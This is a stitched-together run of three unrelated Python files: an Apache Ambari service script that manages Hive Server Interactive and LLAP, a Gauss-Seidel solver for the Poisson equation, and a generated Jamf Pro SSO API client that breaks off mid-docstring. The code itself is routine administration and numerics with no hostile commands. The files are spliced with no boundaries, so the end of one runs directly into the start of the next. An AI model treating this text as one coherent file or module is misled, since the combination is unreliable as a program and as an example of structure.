resource_management.core.source import InlineTemplate from resource_management.core.resources.system import Execute, Directory # Imports needed for Rolling/Express Upgrade from resource_management.libraries.functions import StackFeature from resource_management.libraries.functions.stack_features import check_stack_feature from resource_management.libraries.functions import conf_select from resource_management.libraries.functions import stack_select from resource_management.libraries.functions.copy_tarball import copy_to_hdfs from resource_management.core import shell from resource_management.core.exceptions import Fail from resource_management.core.logger import Logger from ambari_commons import OSCheck, OSConst from ambari_commons.os_family_impl import OsFamilyImpl from resource_management.core.exceptions import ComponentIsNotRunning from resource_management.libraries.functions.decorator import retry from resource_management.libraries.functions.security_commons import build_expectations, \ cached_kinit_executor, get_params_from_filesystem, validate_security_config_properties, \ FILE_TYPE_XML # Local Imports from setup_ranger_hive import setup_ranger_hive from hive_service_interactive import hive_service_interactive from hive_interactive import hive_interactive from hive_server import HiveServerDefault from setup_ranger_hive_interactive import setup_ranger_hive_interactive import traceback class HiveServerInteractive(Script): pass @OsFamilyImpl(os_family=OsFamilyImpl.DEFAULT) class HiveServerInteractiveDefault(HiveServerInteractive): def get_component_name(self): return "hive-server2-hive2" def install(self, env): import params self.install_packages(env) def configure(self, env): import params env.set_params(params) hive_interactive(name='hiveserver2') def pre_upgrade_restart(self, env, upgrade_type=None): Logger.info("Executing Hive Server Interactive Stack Upgrade pre-restart") import params env.set_params(params) if params.version and check_stack_feature(StackFeature.ROLLING_UPGRADE, params.version): stack_select.select("hive-server2-hive2", params.version) conf_select.select(params.stack_name, "hive2", params.version) # Copy hive.tar.gz and tez.tar.gz used by Hive Interactive to HDFS resource_created = copy_to_hdfs( "hive2", params.user_group, params.hdfs_user, skip=params.sysprep_skip_copy_tarballs_hdfs) resource_created = copy_to_hdfs( "tez_hive2", params.user_group, params.hdfs_user, skip=params.sysprep_skip_copy_tarballs_hdfs) or resource_created if resource_created: params.HdfsResource(None, action="execute") def start(self, env, upgrade_type=None): import params env.set_params(params) self.configure(env) if params.security_enabled: # Do the security setup, internally calls do_kinit() self.setup_security() # TODO : We need have conditional [re]start of LLAP once "status check command" for LLAP is ready. # Check status and based on that decide on [re]starting. # Start LLAP before Hive Server Interactive start. status = self._llap_start(env) if not status: raise Fail("Skipping START of Hive Server Interactive since LLAP app couldn't be STARTED.") # TODO : test the workability of Ranger and Hive2 during upgrade setup_ranger_hive_interactive(upgrade_type=upgrade_type) hive_service_interactive('hiveserver2', action='start', upgrade_type=upgrade_type) def stop(self, env, upgrade_type=None): import params env.set_params(params) if params.security_enabled: self.do_kinit() # Stop Hive Interactive Server first hive_service_interactive('hiveserver2', action='stop') if not params.is_restart_command: self._llap_stop(env) else: Logger.info("LLAP stop is skipped as its a restart command") def status(self, env): import status_params env.set_params(status_params) # We are not doing 'llap' status check done here as part of status check for 'HSI', as 'llap' status # check is a heavy weight operation. pid_file = format("{hive_pid_dir}/{hive_interactive_pid}") # Recursively check all existing gmetad pid files check_process_status(pid_file) def security_status(self, env): import status_params env.set_params(status_params) if status_params.security_enabled: props_value_check = {"hive.server2.authentication": "KERBEROS", "hive.metastore.sasl.enabled": "true", "hive.security.authorization.enabled": "true"} props_empty_check = ["hive.server2.authentication.kerberos.keytab", "hive.server2.authentication.kerberos.principal", "hive.server2.authentication.spnego.principal", "hive.server2.authentication.spnego.keytab"] props_read_check = ["hive.server2.authentication.kerberos.keytab", "hive.server2.authentication.spnego.keytab"] hive_site_props = build_expectations('hive-site', props_value_check, props_empty_check, props_read_check) hive_expectations ={} hive_expectations.update(hive_site_props) security_params = get_params_from_filesystem(status_params.hive_server_interactive_conf_dir, {'hive-site.xml': FILE_TYPE_XML}) result_issues = validate_security_config_properties(security_params, hive_expectations) if not result_issues: # If all validations passed successfully try: # Double check the dict before calling execute if 'hive-site' not in security_params \ or 'hive.server2.authentication.kerberos.keytab' not in security_params['hive-site'] \ or 'hive.server2.authentication.kerberos.principal' not in security_params['hive-site'] \ or 'hive.server2.authentication.spnego.keytab' not in security_params['hive-site'] \ or 'hive.server2.authentication.spnego.principal' not in security_params['hive-site']: self.put_structured_out({"securityState": "UNSECURED"}) self.put_structured_out({"securityIssuesFound": "Keytab file or principal are not set property."}) return cached_kinit_executor(status_params.kinit_path_local, status_params.hive_user, security_params['hive-site']['hive.server2.authentication.kerberos.keytab'], security_params['hive-site']['hive.server2.authentication.kerberos.principal'], status_params.hostname, status_params.tmp_dir) cached_kinit_executor(status_params.kinit_path_local, status_params.hive_user, security_params['hive-site']['hive.server2.authentication.spnego.keytab'], security_params['hive-site']['hive.server2.authentication.spnego.principal'], status_params.hostname, status_params.tmp_dir) self.put_structured_out({"securityState": "SECURED_KERBEROS"}) except Exception as e: self.put_structured_out({"securityState": "ERROR"}) self.put_structured_out({"securityStateErrorInfo": str(e)}) else: issues = [] for cf in result_issues: issues.append("Configuration file %s did not pass the validation. Reason: %s" % (cf, result_issues[cf])) self.put_structured_out({"securityIssuesFound": ". ".join(issues)}) self.put_structured_out({"securityState": "UNSECURED"}) else: self.put_structured_out({"securityState": "UNSECURED"}) def restart_llap(self, env): """ Custom command to Restart LLAP """ Logger.info("Custom Command to retart LLAP") import params env.set_params(params) if params.security_enabled: self.do_kinit() self._llap_stop(env) self._llap_start(env) def _llap_stop(self, env): import params Logger.info("Stopping LLAP") stop_cmd = ["slider", "stop", params.llap_app_name] code, output, error = shell.call(stop_cmd, user=params.hive_user, stderr=subprocess.PIPE, logoutput=True) if code == 0: Logger.info(format("Stopped {params.llap_app_name} application on Slider successfully")) elif code == 69 and output is not None and "Unknown application instance" in output: Logger.info(format("Application {params.llap_app_name} was already stopped on Slider")) else: raise Fail(format("Could not stop application {params.llap_app_name} on Slider. {error}\n{output}")) # Will exit with code 4 if need to run with "--force" to delete directories and registries. Execute(('slider', 'destroy', params.llap_app_name, "--force"), user=params.hive_user, timeout=30, ignore_failures=True, ) """ Controls the start of LLAP. """ def _llap_start(self, env, cleanup=False): import params env.set_params(params) if params.hive_server_interactive_ha: """ Check llap app state """ Logger.info("HSI HA is enabled. Checking if LLAP is already running ...") if params.stack_supports_hive_interactive_ga: status = self.check_llap_app_status_in_llap_ga(params.llap_app_name, 2, params.hive_server_interactive_ha) else: status = self.check_llap_app_status_in_llap_tp(params.llap_app_name, 2, params.hive_server_interactive_ha) if status: Logger.info("LLAP app '{0}' is already running.".format(params.llap_app_name)) return True else: Logger.info("LLAP app '{0}' is not running. llap will be started.".format(params.llap_app_name)) pass # Call for cleaning up the earlier run(s) LLAP package folders. self._cleanup_past_llap_package_dirs() Logger.info("Starting LLAP") LLAP_PACKAGE_CREATION_PATH = Script.get_tmp_dir() unique_name = "llap-slider%s" % datetime.utcnow().strftime('%Y-%m-%d_%H-%M-%S') cmd = format("/usr/lib/hive/bin/hive --service llap --slider-am-container-mb {params.slider_am_container_mb} " "--size 3072m --cache 1024m --xmx {params.llap_heap_size}m " "--loglevel {params.llap_log_level} {params.llap_extra_slider_opts} --output {LLAP_PACKAGE_CREATION_PATH}/{unique_name}") # Append params that are supported from Hive llap GA version. if params.stack_supports_hive_interactive_ga: # Figure out the Slider Anti-affinity to be used. # YARN does not support anti-affinity, and therefore Slider implements AA by the means of exclusion lists, i.e, it # starts containers one by one and excludes the nodes it gets (adding a delay of ~2sec./machine). When the LLAP # container memory size configuration is more than half of YARN node memory, AA is implicit and should be avoided. slider_placement = 4 if long(params.llap_daemon_container_size) > (0.5 * long(params.yarn_nm_mem)): slider_placement = 0 Logger.info("Setting slider_placement : 0, as llap_daemon_container_size : {0} > 0.5 * " "YARN NodeManager Memory({1})".format(params.llap_daemon_container_size, params.yarn_nm_mem)) else: Logger.info("Setting slider_placement: 4, as llap_daemon_container_size : {0} <= 0.5 * " "YARN NodeManager Memory({1})".format(params.llap_daemon_container_size, params.yarn_nm_mem)) cmd += format(" --slider-placement {slider_placement} --skiphadoopversion --skiphbasecp --instances {params.num_llap_daemon_running_nodes}") # Setup the logger for the ga version only cmd += format(" --logger {params.llap_logger}") else: cmd += format(" --instances {params.num_llap_nodes}") if params.security_enabled: llap_keytab_splits = params.hive_llap_keytab_file.split("/") Logger.debug("llap_keytab_splits : {0}".format(llap_keytab_splits)) cmd += format(" --slider-keytab-dir .slider/keytabs/{params.hive_user}/ --slider-keytab " "{llap_keytab_splits[4]} --slider-principal {params.hive_llap_principal}") # Add the aux jars if they are specified. If empty, dont need to add this param. if params.hive_aux_jars: cmd+= format(" --auxjars {params.hive_aux_jars}") # Append args. llap_java_args = InlineTemplate(params.llap_app_java_opts).get_content() cmd += format(" --args \" {llap_java_args}\"") # Append metaspace size to args. if params.java_version > 7 and params.llap_daemon_container_size > 4096: if params.llap_daemon_container_size <= 32768: metaspaceSize = "256m" else: metaspaceSize = "1024m" cmd = cmd[:-1] + " -XX:MetaspaceSize="+metaspaceSize+ "\"" run_file_path = None try: Logger.info(format("LLAP start command: {cmd}")) code, output, error = shell.checked_call(cmd, user=params.hive_user, quiet = True, stderr=subprocess.PIPE, logoutput=True) if code != 0 or output is None: raise Fail("Command failed with either non-zero return code or no output.") # E.g., output: # Prepared llap-slider-05Apr2016/run.sh for running LLAP on Slider exp = r".*Prepared (.*?run.sh) for running LLAP" run_file_path = None out_splits = output.split("\n") for line in out_splits: line = line.strip() m = re.match(exp, line, re.I) if m and len(m.groups()) == 1: run_file_name = m.group(1) #run_file_path = os.path.join(params.hive_user_home_dir, run_file_name) run_file_path = run_file_name break if not run_file_path: raise Fail("Did not find run.sh file in output: " + str(output)) Logger.info(format("Run file path: {run_file_path}")) Execute(run_file_path, user=params.hive_user, logoutput=True) Logger.info("Submitted LLAP app name : {0}".format(params.llap_app_name)) # We need to check the status of LLAP app to figure out it got # launched properly and is in running state. Then go ahead with Hive Interactive Server start. if params.stack_supports_hive_interactive_ga: status = self.check_llap_app_status_in_llap_ga(params.llap_app_name, params.num_retries_for_checking_llap_status) else: status = self.check_llap_app_status_in_llap_tp(params.llap_app_name, params.num_retries_for_checking_llap_status) if status: Logger.info("LLAP app '{0}' deployed successfully.".format(params.llap_app_name)) return True else: Logger.error("LLAP app '{0}' deployment unsuccessful.".format(params.llap_app_name)) return False except: # Attempt to clean up the packaged application, or potentially rename it with a .bak if run_file_path is not None and cleanup: parent_dir = os.path.dirname(run_file_path) Directory(parent_dir, action = "delete", ignore_failures = True, ) # throw the original exception raise """ Checks and deletes previous run 'LLAP package' folders, ignoring three latest packages. Last three are are ignore for debugging/reference purposes. Helps in keeping check on disk space used. """ def _cleanup_past_llap_package_dirs(self): try: import params Logger.info("Determining previous run 'LLAP package' folder(s) to be deleted ....") llap_package_folder_name_prefix = "llap-slider" # Package name is like : llap-sliderYYYY-MM-DD-HH:MM:SS num_folders_to_retain = 3 # Hardcoding it as of now, as no considerable use was found to provide an env param. file_names = [dir_name for dir_name in os.listdir(Script.get_tmp_dir()) if dir_name.startswith(llap_package_folder_name_prefix)] file_names.sort() del file_names[-num_folders_to_retain:] # Ignore 'num_folders_to_retain' latest package folders. Logger.info("Previous run 'LLAP package' folder(s) to be deleted = {0}".format(file_names)) if file_names: for path in file_names: abs_path = Script.get_tmp_dir()+"/"+path Directory(abs_path, action = "delete", ignore_failures = True ) else: Logger.info("No '{0}*' folder deleted.".format(llap_package_folder_name_prefix)) except: Logger.exception("Exception while doing cleanup for past 'LLAP package(s)':") """ Does kinit and copies keytab for Hive/LLAP to HDFS. """ def setup_security(self): import params self.do_kinit() # Copy params.hive_llap_keytab_file to hdfs://:/user//.slider/keytabs/ , required by LLAP slider_keytab_install_cmd = format("slider install-keytab --keytab {params.hive_llap_keytab_file} --folder {params.hive_user} --overwrite") Execute(slider_keytab_install_cmd, user=params.hive_user) def do_kinit(self): import params hive_interactive_kinit_cmd = format("{kinit_path_local} -kt {params.hive_server2_keytab} {params.hive_principal}; ") Execute(hive_interactive_kinit_cmd, user=params.hive_user) llap_kinit_cmd = format("{kinit_path_local} -kt {params.hive_llap_keytab_file} {params.hive_llap_principal}; ") Execute(llap_kinit_cmd, user=params.hive_user) """ Get llap app status data for LLAP Tech Preview code base. """ def _get_llap_app_status_info_in_llap_tp(self, app_name): import status_params LLAP_APP_STATUS_CMD_TIMEOUT = 0 llap_status_cmd = format("/usr/lib/hive/bin/hive --service llapstatus --name {app_name} --findAppTimeout {LLAP_APP_STATUS_CMD_TIMEOUT}") code, output, error = shell.checked_call(llap_status_cmd, user=status_params.hive_user, stderr=subprocess.PIPE, logoutput=False) Logger.info("Received 'llapstatus' command 'output' : {0}".format(output)) if code == 0: return self._make_valid_json(output) else: Logger.info("'LLAP status command' output : ", output) Logger.info("'LLAP status command' error : ", error) Logger.info("'LLAP status command' exit code : ", code) raise Fail("Error getting LLAP app status. ") """ Get llap app status data for LLAP GA code base. Parameters: 'percent_desired_instances_to_be_up' : A value b/w 0.0 and 1.0. 'total_timeout' : Total wait time while checking the status via llapstatus command 'refresh_rate' : Frequency of polling for llapstatus. """ def _get_llap_app_status_info_in_llap_ga(self, percent_desired_instances_to_be_up, total_timeout, refresh_rate): import status_params # llapstatus comamnd : llapstatus -w -r -i -t # -w : Watch mode waits until all LLAP daemons are running or subset of the nodes are running (threshold can be specified via -r option) (Default wait until all nodes are running) # -r : When watch mode is enabled (-w), wait until the specified threshold of nodes are running (Default 1.0 which means 100% nodes are running) # -i : Amount of time in seconds to wait until subsequent status checks in watch mode (Default: 1sec) # -t : Exit watch mode if the desired state is not attained until the specified timeout (Default: 300sec) # # example : llapstatus -w -r 0.8 -i 2 -t 150 llap_status_cmd = format("/usr/lib/hive/bin/hive --service llapstatus -w -r {percent_desired_instances_to_be_up} -i {refresh_rate} -t {total_timeout}") Logger.info("\n\n\n\n\n"); Logger.info("LLAP status command : {0}".format(llap_status_cmd)) code, output, error = shell.checked_call(llap_status_cmd, user=status_params.hive_user, quiet=True, stderr=subprocess.PIPE, logoutput=True) if code == 0: return self._make_valid_json(output) else: Logger.info("'LLAP status command' output : ", output) Logger.info("'LLAP status command' error : ", error) Logger.info("'LLAP status command' exit code : ", code) raise Fail("Error getting LLAP app status. ") """ Remove extra lines from 'llapstatus' status output (eg: because of MOTD logging) so as to have a valid JSON data to be passed in to JSON converter. """ def _make_valid_json(self, output): ''' Note: It is assumed right now that extra lines will be only at the start and not at the end. Sample expected JSON to be passed for 'loads' is either of the form : Case 'A': { "amInfo" : { "appName" : "llap0", "appType" : "org-apache-slider", "appId" : "APP1", "containerId" : "container_1466036628595_0010_01_000001", "hostname" : "hostName", "amWebUrl" : "http://hostName:port/" }, "state" : "LAUNCHING", .... "desiredInstances" : 1, "liveInstances" : 0, .... .... } or Case 'B': { "state" : "APP_NOT_FOUND" } ''' splits = output.split("\n") len_splits = len(splits) if (len_splits < 3): raise Fail ("Malformed JSON data received from 'llapstatus' command. Exiting ....") marker_idx = None # To detect where from to start reading for JSON data for idx, split in enumerate(splits): curr_elem = split.strip() if idx+2 > len_splits: raise Fail("Iterated over the received 'llapstatus' comamnd. Couldn't validate the received output for JSON parsing.") next_elem = (splits[(idx + 1)]).strip() if curr_elem == "{": if next_elem == "\"amInfo\" : {" and (splits[len_splits-1]).strip() == '}': # For Case 'A' marker_idx = idx break; elif idx+3 == len_splits and next_elem.startswith('"state" : ') and (splits[idx + 2]).strip() == '}': # For Case 'B' marker_idx = idx break; # Remove extra logging from possible JSON output if marker_idx is None: raise Fail("Couldn't validate the received output for JSON parsing.") else: if marker_idx != 0: del splits[0:marker_idx] scanned_output = '\n'.join(splits) llap_app_info = json.loads(scanned_output) return llap_app_info """ Checks llap app status. The states can be : 'COMPLETE', 'APP_NOT_FOUND', 'RUNNING_PARTIAL', 'RUNNING_ALL' & 'LAUNCHING'. if app is in 'APP_NOT_FOUND', 'RUNNING_PARTIAL' and 'LAUNCHING' state: we wait for 'num_times_to_wait' to have app in (1). 'RUNNING_ALL' or (2). 'RUNNING_PARTIAL' state with 80% or more 'desiredInstances' running and Return True else : Return False Parameters: llap_app_name : deployed llap app name. num_retries : Number of retries to check the LLAP app status. """ def check_llap_app_status_in_llap_tp(self, llap_app_name, num_retries, return_immediately_if_stopped=False): curr_time = time.time() num_retries = int(num_retries) if num_retries <= 0: Logger.info("Read 'num_retries' as : {0}. Setting it to : {1}".format(num_retries, 2)) num_retries = 2 if num_retries > 20000000000: Logger.info("Read 'num_retries' as : {0}. Setting it to : {1}".format(num_retries, 1000)) num_retries = 1000 @retry(times=num_retries, sleep_time=2, err_class=Fail) def do_retries(): llap_app_info = self._get_llap_app_status_info_in_llap_tp(llap_app_name) return self._verify_llap_app_status(llap_app_info, llap_app_name, return_immediately_if_stopped, curr_time) try: status = do_retries() return status except Exception, e: Logger.info("LLAP app '{0}' did not come up after a wait of {1} seconds.".format(llap_app_name, time.time() - curr_time)) traceback.print_exc() return False def check_llap_app_status_in_llap_ga(self, llap_app_name, num_retries, return_immediately_if_stopped=False): curr_time = time.time() total_timeout = int(num_retries) * 20; # Total wait time while checking the status via llapstatus command Logger.debug("Calculated 'total_timeout' : {0} using config 'num_retries_for_checking_llap_status' : {1}".format(total_timeout, num_retries)) refresh_rate = 2 # Frequency of checking the llapstatus percent_desired_instances_to_be_up = 80 # Out of 100. llap_app_info = self._get_llap_app_status_info_in_llap_ga(percent_desired_instances_to_be_up/100.0, total_timeout, refresh_rate) try: return self._verify_llap_app_status(llap_app_info, llap_app_name, return_immediately_if_stopped, curr_time) except Exception as e: Logger.info(e.message) return False def get_log_folder(self): import params return params.hive_log_dir def get_user(self): import params return params.hive_user def _verify_llap_app_status(self, llap_app_info, llap_app_name, return_immediately_if_stopped, curr_time): if llap_app_info is None or 'state' not in llap_app_info: Logger.error("Malformed JSON data received for LLAP app. Exiting ....") return False # counters based on various states. live_instances = 0 desired_instances = 0 percent_desired_instances_to_be_up = 80 # Used in 'RUNNING_PARTIAL' state. if return_immediately_if_stopped and (llap_app_info['state'].upper() in ('APP_NOT_FOUND', 'COMPLETE')): return False if llap_app_info['state'].upper() == 'RUNNING_ALL': Logger.info( "LLAP app '{0}' in '{1}' state.".format(llap_app_name, llap_app_info['state'])) return True elif llap_app_info['state'].upper() == 'RUNNING_PARTIAL': # Check how many instances were up. if 'liveInstances' in llap_app_info and 'desiredInstances' in llap_app_info: live_instances = llap_app_info['liveInstances'] desired_instances = llap_app_info['desiredInstances'] else: Logger.info( "LLAP app '{0}' is in '{1}' state, but 'instances' information not available in JSON received. " \ "Exiting ....".format(llap_app_name, llap_app_info['state'])) Logger.info(llap_app_info) return False if desired_instances == 0: Logger.info("LLAP app '{0}' desired instance are set to 0. Exiting ....".format(llap_app_name)) return False percentInstancesUp = 0 if live_instances > 0: percentInstancesUp = float(live_instances) / desired_instances * 100 if percentInstancesUp >= percent_desired_instances_to_be_up: Logger.info("LLAP app '{0}' in '{1}' state. Live Instances : '{2}' >= {3}% of Desired Instances : " \ "'{4}'.".format(llap_app_name, llap_app_info['state'], llap_app_info['liveInstances'], percent_desired_instances_to_be_up, llap_app_info['desiredInstances'])) return True else: Logger.info("LLAP app '{0}' in '{1}' state. Live Instances : '{2}'. Desired Instances : " \ "'{3}' after {4} secs.".format(llap_app_name, llap_app_info['state'], llap_app_info['liveInstances'], llap_app_info['desiredInstances'], time.time() - curr_time)) raise Fail("App state is RUNNING_PARTIAL. Live Instances : '{0}', Desired Instance : '{1}'".format(llap_app_info['liveInstances'], llap_app_info['desiredInstances'])) elif llap_app_info['state'].upper() in ['APP_NOT_FOUND', 'LAUNCHING', 'COMPLETE']: status_str = format("LLAP app '{0}' current state is {1}.".format(llap_app_name, llap_app_info['state'])) Logger.info(status_str) raise Fail(status_str) else: # Covers any unknown that we get. Logger.info( "LLAP app '{0}' current state is '{1}'. Expected : 'RUNNING'.".format(llap_app_name, llap_app_info['state'])) return False @OsFamilyImpl(os_family=OSConst.WINSRV_FAMILY) class HiveServerInteractiveWindows(HiveServerInteractive): def status(self, env): pass if __name__ == "__main__": HiveServerInteractive().execute() poissonGS.py # -*- coding: utf-8 -*- """ Created on Thu Apr 23 15:21:15 2020 @author: Wei-shan Solving Poisson Equation del^2 V = -rho in the electric potential problem with Finite difference of Gauss-Seidel Method and overrelaxation. Reference: , Computational Physics, CH9. """ from pylab import imshow,gray,show import numpy as np import matplotlib.pyplot as plt from matplotlib.ticker import AutoMinorLocator import pandas as pd # Constants M = 100 # Grid squares on a side V = 30.0 # Voltage at top wall rho = 1.0 # charge density target = 1e-6 # Target accuracy omega = 0.9 delta = 1.0 xMin = 0.0 xMax = 100.0 yMin = 0.0 yMax = 100.0 # Create arrays to hold potential values phi = np.zeros([M+1,M+1],float) # phi[y,x] # Main loop while delta>target: delta = 0.0 # Calculate new values of the potential for i in range(M+1): for j in range(M+1): ## Setting up boundary conditions (Simulation 1) if i==0: phi[i,j] = V elif j==0: phi[i,j] = V elif i==M: phi[i,j] = -V elif j==M: #or j==M: # something is wrong for setting phi[i,j]=V at i==M or j==M phi[i,j] = -V ## End of Setting up boundary conditions (Simulation 1No) ## Setting up other boundary values inside the digram (Simulation 3) #if i==0 or i==M or j==0 or j==M: # phi[i,j] = 0.0 #elif (i>=20 and i<=80) and j==20: # phi[i,j]=V #elif (i>=20 and i<=80) and j==80: # phi[i,j]=-V ## End of Setting up other boundary values inside the digram (Simulation 3) ## Charge densit ## Setting up rho value (Simulation 2) elif ( ( i>=20 and i<=40 ) and ( j>=60 and j<=80 ) ): temp = (phi[i+1,j] + phi[i-1,j] + phi[i,j+1] + phi[i,j-1])*(1+omega)/4 - omega * phi[i,j] + 1/4*rho if ( abs( phi[i,j] - temp ) > delta ): delta = abs( phi[i,j] - temp ) phi[i,j] = temp #elif ( ( i>=60 and i<=80 ) and ( j>=20 and j<=40 ) ): # temp = (phi[i+1,j] + phi[i-1,j] + phi[i,j+1] + phi[i,j-1])*(1+omega)/4 - omega * phi[i,j] - 1/4*rho # if ( abs( phi[i,j] - temp ) > delta ): delta = abs( phi[i,j] - temp ) # phi[i,j] = temp ## End of Setting up rho value (Simulation 2) else: temp = (phi[i+1,j] + phi[i-1,j] + phi[i,j+1] + phi[i,j-1])*(1+omega)/4 - omega * phi[i,j] if ( abs( phi[i,j] - temp ) > delta ): delta = abs( phi[i,j] - temp ) phi[i,j] = temp # End of main loop # Make a plot ax = plt.gca() imshow(phi,extent=[xMin,xMax,yMin,yMax])#,origin="lower") plt.minorticks_on() minorLocatorX = AutoMinorLocator(4) # number of minor intervals per major # inteval minorLocatorY = AutoMinorLocator(4) ax.xaxis.set_minor_locator(minorLocatorX) # add minor ticks on x axis ax.yaxis.set_minor_locator(minorLocatorY) # add minor ticks on y axis ax.set_xticklabels(ax.get_xticks(),family='monospace',fontsize=10) ax.set_yticklabels(ax.get_yticks(),family='monospace',fontsize=10) gray() show() # Save location vs voltage into csv file. phiData = pd.DataFrame(columns = ['X','Y','Voltage']) phiData_file = open(r'E:\github\Solving-Poisson-Equation-with-finite-difference-Gauss-Seidel-Method\poissonGS.csv','w',newline='') X = [] Y = [] Voltage = [] for i in range(M+1): for j in range(M+1): X += [j * (xMax-xMin)/M] Y += [i * (yMax-yMin)/M] Voltage += [ phi[i,j] ] phiData['X'] = X phiData['Y'] = Y phiData['Voltage'] = Voltage phiData.to_csv(phiData_file, sep=',', encoding='utf-8', index=False) phiData_file.close()# coding: utf-8 """ Jamf Pro API ## Overview This is a sample Jamf Pro server which allows for usage without any authentication. The Jamf Pro environment which supports the Try it Out functionality does not run the current beta version of Jamf Pro, thus any newly added endpoints will result in an error and should be used soley for documentation purposes. # noqa: E501 The version of the OpenAPI document: 10.25.0 Generated by: https://openapi-generator.tech """ from __future__ import absolute_import import re # noqa: F401 # python 2 and python 3 compatibility library import six from jamf.api_client import ApiClient from jamf.exceptions import ( # noqa: F401 ApiTypeError, ApiValueError ) class SsoSettingsApi(object): """NOTE: This class is auto generated by OpenAPI Generator Ref: https://openapi-generator.tech Do not edit the class manually. """ def __init__(self, api_client=None): if api_client is None: api_client = ApiClient() self.api_client = api_client def v1_sso_dependencies_get(self, **kwargs): # noqa: E501 """Retrieve the list of Enrollment Customizations using SSO # noqa: E501 Retrieves the list of Enrollment Customizations using SSO # noqa: E501 This method makes a synchronous HTTP request by default. To make an asynchronous HTTP request, please pass async_req=True >>> thread = api.v1_sso_dependencies_get(async_req=True) >>> result = thread.get() :param async_req: Whether to execute the request asynchronously. :type async_req: bool, optional :param _preload_content: if False, the urllib3.HTTPResponse object will be returned without reading/decoding response data. Default is True. :type _preload_content: bool, optional :param _request_timeout: timeout setting for this request. If one number provided, it will be total request timeout. It can also be a pair (tuple) of (connection, read) timeouts. :return: Returns the result object. If the method is called asynchronously, returns the request thread. :rtype: EnrollmentCustomizationDependencies """ kwargs['_return_http_data_only'] = True return self.v1_sso_dependencies_get_with_http_info(**kwargs) # noqa: E501 def v1_sso_dependencies_get_with_http_info(self, **kwargs): # noqa: E501 """Retrieve the list of Enrollment Customizations using SSO # noqa: E501 Retrieves the list of Enrollment Customizations using SSO # noqa: E501 This method makes a synchronous HTTP request by default. To make an asynchronous HTTP request, please pass async_req=True >>> thread = api.v1_sso_dependencies_get_with_http_info(async_req=True) >>> result = thread.get() :param async_req: Whether to execute the request asynchronously. :type async_req: bool, optional :param _return_http_data_only: response data without head status code and headers :type _return_http_data_only: bool, optional :param _preload_content: if False, the urllib3.HTTPResponse object will be returned without reading/decoding response data. Default is True. :type _preload_content: bool, optional :param _request_timeout: timeout setting for this request. If one number provided, it will be total request timeout. It can also be a pair (tuple) of (connection, read) timeouts. :param _request_auth: set to override the auth_settings for an a single request; this effectively ignores the authentication in the spec for a single request. :type _request_auth: dict, optional :return: Returns the result object. If the method is called asynchronously, returns the request thread. :rtype: tuple(EnrollmentCustomizationDependencies, status_code(int), headers(HTTPHeaderDict)) """ local_var_params = locals() all_params = [ ] all_params.extend( [ 'async_req', '_return_http_data_only', '_preload_content', '_request_timeout', '_request_auth' ] ) for key, val in six.iteritems(local_var_params['kwargs']): if key not in all_params: raise ApiTypeError( "Got an unexpected keyword argument '%s'" " to method v1_sso_dependencies_get" % key ) local_var_params[key] = val del local_var_params['kwargs'] collection_formats = {} path_params = {} query_params = [] header_params = {} form_params = [] local_var_files = {} body_params = None # HTTP header `Accept` header_params['Accept'] = self.api_client.select_header_accept( ['application/json']) # noqa: E501 # Authentication setting auth_settings = [] # noqa: E501 response_types_map = { 200: "EnrollmentCustomizationDependencies", } return self.api_client.call_api( '/v1/sso/dependencies', 'GET', path_params, query_params, header_params, body=body_params, post_params=form_params, files=local_var_files, response_types_map=response_types_map, auth_settings=auth_settings, async_req=local_var_params.get('async_req'), _return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501 _preload_content=local_var_params.get('_preload_content', True), _request_timeout=local_var_params.get('_request_timeout'), collection_formats=collection_formats, _request_auth=local_var_params.get('_request_auth')) def v1_sso_disable_post(self, **kwargs): # noqa: E501 """Disable SSO # noqa: E501 Disable SSO # noqa: E501 This method makes a synchronous HTTP request by default. To make an asynchronous HTTP request, please pass async_req=True >>> thread = api.v1_sso_disable_post(async_req=True) >>> result = thread.get() :param async_req: Whether to execute the request asynchronously. :type async_req: bool, optional :param _preload_content: if False, the urllib3.HTTPResponse object will be returned without reading/decoding response data. Default is True. :type _preload_content: bool, optional :param _request_timeout: timeout setting for this request. If one number provided, it will be total request timeout. It can also be a pair (tuple) of (connection, read) timeouts. :return: Returns the result object. If the method is called asynchronously, returns the request thread. :rtype: None """ kwargs['_return_http_data_only'] = True return self.v1_sso_disable_post_with_http_info(**kwargs) # noqa: E501 def v1_sso_disable_post_with_http_info(self, **kwargs): # noqa: E501 """Disable SSO # noqa: E501 Disable SSO # noqa: E501 This method makes a synchronous HTTP request by default. To make an asynchronous HTTP request, please pass async_req=True >>> thread = api.v1_sso_disable_post_with_http_info(async_req=True) >>> result = thread.get() :param async_req: Whether to execute the request asynchronously. :type async_req: bool, optional :param _return_http_data_only: response data without head status code and headers :type _return_http_data_only: bool, optional :param _preload_content: if False, the urllib3.HTTPResponse object will be returned without reading/decoding response data. Default is True. :type _preload_content: bool, optional :param _request_timeout: timeout setting for this request. If one number provided, it will be total request timeout. It can also be a pair (tuple) of (connection, read) timeouts. :param _request_auth: set to override the auth_settings for an a single request; this effectively ignores the authentication in the spec for a single request. :type _request_auth: dict, optional :return: Returns the result object. If the method is called asynchronously, returns the request thread. :rtype: None """ local_var_params = locals() all_params = [ ] all_params.extend( [ 'async_req', '_return_http_data_only', '_preload_content', '_request_timeout', '_request_auth' ] ) for key, val in six.iteritems(local_var_params['kwargs']): if key not in all_params: raise ApiTypeError( "Got an unexpected keyword argument '%s'" " to method v1_sso_disable_post" % key ) local_var_params[key] = val del local_var_params['kwargs'] collection_formats = {} path_params = {} query_params = [] header_params = {} form_params = [] local_var_files = {} body_params = None # Authentication setting auth_settings = [] # noqa: E501 response_types_map = {} return self.api_client.call_api( '/v1/sso/disable', 'POST', path_params, query_params, header_params, body=body_params, post_params=form_params, files=local_var_files, response_types_map=response_types_map, auth_settings=auth_settings, async_req=local_var_params.get('async_req'), _return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501 _preload_content=local_var_params.get('_preload_content', True), _request_timeout=local_var_params.get('_request_timeout'), collection_formats=collection_formats, _request_auth=local_var_params.get('_request_auth')) def v1_sso_get(self, **kwargs): # noqa: E501 """Retrieve the current Single Sign On configuration settings # noqa: E501 Retrieves the current Single Sign On configuration settings # noqa: E501 This method makes a synchronous HTTP request by default. To make an asynchronous HTTP request, please pass async_req=True >>> thread = api.v1_sso_get(async_req=True) >>> result = thread.get() :param async_req: Whether to execute the request asynchronously. :type async_req: bool, optional :param _preload_content: if False, the urllib3.HTTPResponse object will be returned without reading/decoding response data. Default is True. :type _preload_content: bool, optional :param _request_timeout: timeout setting for this request. If one number provided, it will be total request timeout. It can also be a 